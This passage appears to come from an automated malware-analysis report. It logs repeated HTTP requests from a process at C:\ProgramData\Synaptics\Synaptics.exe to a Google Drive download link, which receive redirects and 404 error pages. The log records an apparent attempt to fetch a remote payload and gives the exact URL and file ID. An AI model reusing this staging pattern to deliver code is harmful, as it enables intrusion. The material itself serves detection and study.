                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:18 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 67 4d 50 30 59 67 73 58 4f 4e 5f 51 71 59 32 56 2d 75 57 31 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="QgMP0YgsXON_QqY2V-uW1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:18 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              82192.168.2.449861142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:18 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              83192.168.2.449862142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:18 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              84192.168.2.449863142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:19 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              85192.168.2.449864142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:19 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              86192.168.2.449867142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:19 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:20 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-8H5BC66CnpY3WV-VWdSPcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              87192.168.2.449866142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:19 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:20 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-EHPzdVXFjmnftE0NrqjhXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              88192.168.2.449870142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:20 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:21 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7-f8mbrvkx35DRwltJ1vvArxwl05VqKond6OU1t0FsWjxyGH-m-CMJ3JHSi6EUlhFm
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:21 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-WE-vKCV-0CwNkNIUNGQUOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:21 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:21 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 43 4c 79 51 71 48 6b 50 38 49 66 6b 45 48 4f 76 30 73 48 4f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="zCLyQqHkP8IfkEHOv0sHOg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:21 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              89192.168.2.449871142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:20 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:21 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce--L2uMHTh5Zaienn3xICoig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              90192.168.2.449873142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:20 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:21 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC6U7SkHgCFWVNvBsx6MKknBv0tX1mdUoYTO5gScq2t53SZTMnanqIWtn2mnZxJJvO8f
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:21 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-6YKQDDoArSa8Zn2XpjZOKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:21 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:21 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 49 75 62 63 57 63 56 74 63 79 63 34 41 47 6b 7a 72 79 49 69 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="DIubcWcVtcyc4AGkzryIiQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:21 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              91192.168.2.449872142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:20 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:21 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-1Jy5KM6SPyX5lw9lYgh3sA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              92192.168.2.449874142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:21 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:22 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:22 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
